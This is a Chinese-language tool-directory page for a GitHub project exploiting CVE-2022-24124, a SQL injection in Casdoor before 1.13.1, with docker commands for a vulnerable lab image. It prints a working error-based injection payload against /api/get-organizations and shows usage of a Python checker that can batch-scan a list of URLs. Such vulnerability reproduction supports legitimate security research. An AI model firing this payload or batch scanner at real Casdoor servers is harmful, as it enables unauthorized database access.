Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-24124 — CVE-2022-24124 漏洞利用 | Kitploit
工具/GitHubGitHub/b1gdog/cve-2022-24124
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubb1gdog/cve-2022-24124

CVE-2022-24124

CVE-2022-24124 漏洞利用

查看仓库
223年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

前言

Casdoor是一个基于OAuth 2.0/OIDC的中心化的单点登录(SSO)身份验证平台


编号

CVE编号:CVE-2022-24124

CNPD编号:CNPD-202201-7304


影响版本

危险等级:高 ( 7.5 HIGH )

POC/EXP:已公开

Casdoor < Casdoor 1.13.1 //1.13.1版本之前均受影响


漏洞简介

此漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。


复现

拉取漏洞镜像

docker pull vulfocus/casdoor:1.13.0

拉取docker

启动漏洞环境

docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

dockerRun

打开漏洞环境页面

http

使用POC构造payload

POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

1661963474975


一键验证脚本

声明: 工具仅供安全研究或授权渗透,非法用途后果自负,作者并不承担任何责任以及连带责任

root@kitploit:~
python3 CVE-2022-24124.py -h

image

root@kitploit:~
python3 CVE-2022-24124.py -u http://127.0.0.1

image

root@kitploit:~
python3 CVE-2022-24124.py -f urls.txt

image


相关信息

https://nvd.nist.gov/vuln/detail/CVE-2022-24124

https://github.com/ColdFusionX/CVE-2022-24124

https://github.com/0xAbbarhSF/CVE-2022-24124

借鉴于https://www.t00ls.com/thread-66989-1-1.html

练手写了一个python版本的,并且加了一个批量检测的功能

下载工具